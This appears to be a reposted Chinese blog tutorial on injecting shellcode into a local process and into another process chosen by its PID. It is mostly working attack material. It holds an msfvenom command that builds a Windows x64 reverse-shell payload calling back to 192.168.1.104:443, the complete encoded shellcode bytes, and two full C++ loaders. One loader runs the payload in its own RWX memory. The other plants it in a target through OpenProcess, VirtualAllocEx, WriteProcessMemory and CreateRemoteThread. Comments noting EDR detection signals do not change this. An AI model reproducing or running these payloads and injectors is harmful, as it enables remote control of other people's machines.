
将shellcode注入本地进程

2021-02-04 14:04:40  阅读:178  来源: 互联网



这次我们来学习一下将shellcode注入本地进程内存并且执行的经典方法

首先生成我们的shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d

 

root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.104 LPORT=443 -f c -b \x00\x0a\x0d
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=50, char=0x61)
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 503 (iteration=0)
x64/xor chosen with final size 503
Payload size: 503 bytes
Final size of c file: 2138 bytes
unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

 这里我们用c++注入本地进程

// ConsoleApplication3.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"


#include "stdafx.h"
#include "Windows.h"

/*
 * Entry point of the "local runner": copies the byte array below into a
 * freshly allocated executable region of this same process and then
 * transfers control into it.
 *
 * Defender's notes on what is visible in this block:
 *  - the region is requested as PAGE_EXECUTE_READWRITE in a single
 *    VirtualAlloc call, i.e. writable and executable at the same time;
 *  - the bytes are written with a plain memcpy and then called through an
 *    indirect function pointer, so execution starts from a private,
 *    non-image-backed allocation.
 *  Both of these are common telemetry signals for memory scanners / EDR.
 *
 * Returns 0 if control ever comes back from the called bytes; nothing
 * here guarantees that it does.
 */
int main()
{
	// Opaque payload bytes produced by msfvenom (the console log above
	// shows the x64/xor encoder being chosen). They are only copied here,
	// never interpreted.
	unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

	// Reserve+commit sizeof buf bytes that are readable, writable and
	// executable at once (RWX). The return value is not checked: a NULL
	// here would make the memcpy below fault.
	void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, buf, sizeof buf);
	// Reinterpret the allocation as a no-argument function and call it;
	// from here on the copied bytes are what runs on this thread.
	((void(*)())exec)();

    return 0;
}

 

 

 

我们来反汇编一下看看这个shellcode是如何在x64机器上面运行的

 

 下面我们将shellcode注入到指定pid进程

我们构造注入进程的c++代码

// ConsoleApplication4.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include "Windows.h"

/*
 * Entry point of the "remote injector": takes a target PID as argv[1],
 * plants the byte array below inside that process and starts a thread
 * there whose start address is the planted buffer. This is the textbook
 * OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread
 * chain.
 *
 * Defender's notes on what is visible in this block:
 *  - the target handle is requested with PROCESS_ALL_ACCESS;
 *  - the remote allocation is PAGE_EXECUTE_READWRITE from the moment it is
 *    created, across a process boundary;
 *  - the new thread's start routine points into that private allocation
 *    rather than into any mapped image.
 *  Handle-access auditing, cross-process RWX allocation and thread creation
 *  from an unbacked region are each commonly monitored signals.
 *
 * No API return value is checked anywhere in this function, and argc is
 * never tested before argv[1] is read.
 *
 * Returns 0 unconditionally.
 */
int main(int argc, char *argv[])
{
    // Same opaque msfvenom output as the local runner above; it is written
    // into the target verbatim and never interpreted here.
    unsigned char buf[] = 
"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xec\x91\x66\x93\xd5\xdb\x11\xd7\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x10\xd9\xe5\x77\x25\x33"
"\xd1\xd7\xec\x91\x27\xc2\x94\x8b\x43\x86\xba\xd9\x57\x41\xb0"
"\x93\x9a\x85\x8c\xd9\xed\xc1\xcd\x93\x9a\x85\xcc\xd9\xed\xe1"
"\x85\x93\x1e\x60\xa6\xdb\x2b\xa2\x1c\x93\x20\x17\x40\xad\x07"
"\xef\xd7\xf7\x31\x96\x2d\x58\x6b\xd2\xd4\x1a\xf3\x3a\xbe\xd0"
"\x37\xdb\x5e\x89\x31\x5c\xae\xad\x2e\x92\x05\x50\x91\x5f\xec"
"\x91\x66\xdb\x50\x1b\x65\xb0\xa4\x90\xb6\xc3\x5e\x93\x09\x93"
"\x67\xd1\x46\xda\xd4\x0b\xf2\x81\xa4\x6e\xaf\xd2\x5e\xef\x99"
"\x9f\xed\x47\x2b\xa2\x1c\x93\x20\x17\x40\xd0\xa7\x5a\xd8\x9a"
"\x10\x16\xd4\x71\x13\x62\x99\xd8\x5d\xf3\xe4\xd4\x5f\x42\xa0"
"\x03\x49\x93\x67\xd1\x42\xda\xd4\x0b\x77\x96\x67\x9d\x2e\xd7"
"\x5e\x9b\x0d\x9e\xed\x41\x27\x18\xd1\x53\x59\xd6\x3c\xd0\x3e"
"\xd2\x8d\x85\x48\x8d\xad\xc9\x27\xca\x94\x81\x59\x54\x00\xb1"
"\x27\xc1\x2a\x3b\x49\x96\xb5\xcb\x2e\x18\xc7\x32\x46\x28\x13"
"\x6e\x3b\xda\x6b\xac\x62\xe5\xb3\xa2\x54\x93\xd5\x9a\x47\x9e"
"\x65\x77\x2e\x12\x39\x7b\x10\xd7\xec\xd8\xef\x76\x9c\x67\x13"
"\xd7\xed\x2a\xa6\x3b\xd4\xb3\x50\x83\xa5\x18\x82\xdf\x5c\x2a"
"\x50\x6d\xa0\xe6\x40\x94\x2a\x0e\x5d\x5e\x06\xf9\x67\x92\xd5"
"\xdb\x48\x96\x56\xb8\xe6\xf8\xd5\x24\xc4\x87\xbc\xdc\x57\x5a"
"\x98\xea\xd1\x9f\x13\x51\x2e\x1a\x17\x93\xee\x17\xa4\x18\xa7"
"\xd2\x6f\x31\x1e\x08\x0c\x6e\xb3\xdb\x5c\x1c\x7b\xc7\xad\xc9"
"\x2a\x1a\x37\x93\x98\x2e\xad\x2b\xff\x36\xa1\xba\xee\x02\xa4"
"\x10\xa2\xd3\xd7\xdb\x11\x9e\x54\xf2\x0b\xf7\xd5\xdb\x11\xd7"
"\xec\xd0\x36\xd2\x85\x93\x98\x35\xbb\xc6\x31\xde\xe4\x1b\x7b"
"\xda\xb5\xd0\x36\x71\x29\xbd\xd6\x93\xc8\xc5\x67\x92\x9d\x56"
"\x55\xf3\xf4\x57\x66\xfb\x9d\x52\xf7\x81\xbc\xd0\x36\xd2\x85"
"\x9a\x41\x9e\x13\x51\x27\xc3\x9c\x24\xd9\x9a\x65\x50\x2a\x1a"
"\x14\x9a\xab\xae\x20\xae\xe0\x6c\x00\x93\x20\x05\xa4\x6e\xac"
"\x18\xdb\x9a\xab\xdf\x6b\x8c\x06\x6c\x00\x60\xe1\x62\x4e\xc7"
"\x27\x29\x73\x4e\xac\x4a\x13\x44\x2e\x10\x11\xf3\x2d\xd1\x90"
"\x9b\xe6\x68\x35\xae\x14\x6c\xab\x82\x14\xfc\xbf\xdb\x48\x96"
"\x65\x4b\x99\x46\xd5\xdb\x11\xd7";

    HANDLE processHandle;   // handle to the target process (from OpenProcess)
    HANDLE remoteThread;    // thread started inside the target (from CreateRemoteThread)
    PVOID remoteBuffer;     // address of the allocation inside the target's address space

    // argc is not checked: run with no argument, argv[1] is NULL and
    // atoi(NULL) is undefined behaviour.
    printf("Injecting to PID: %i", atoi(argv[1]));
    // Open the target with full access rights. A NULL (failed open) is not
    // detected and is passed straight into the calls below.
    processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
    // Allocate sizeof buf bytes inside the target, RWX in a single step.
    remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    // Copy the bytes across; the bytes-written out-parameter is NULL and the
    // BOOL result is discarded, so a partial or failed write goes unnoticed.
    WriteProcessMemory(processHandle, remoteBuffer, buf, sizeof buf, NULL);
    // Start a thread in the target with the planted buffer as its start
    // routine. The returned handle is stored but never waited on or closed
    // before this process exits.
    remoteThread = CreateRemoteThread(processHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
    // Only the process handle is released here.
    CloseHandle(processHandle);

    return 0;
}

 

 

来源: https://www.cnblogs.com/-zhong/p/13758119.html
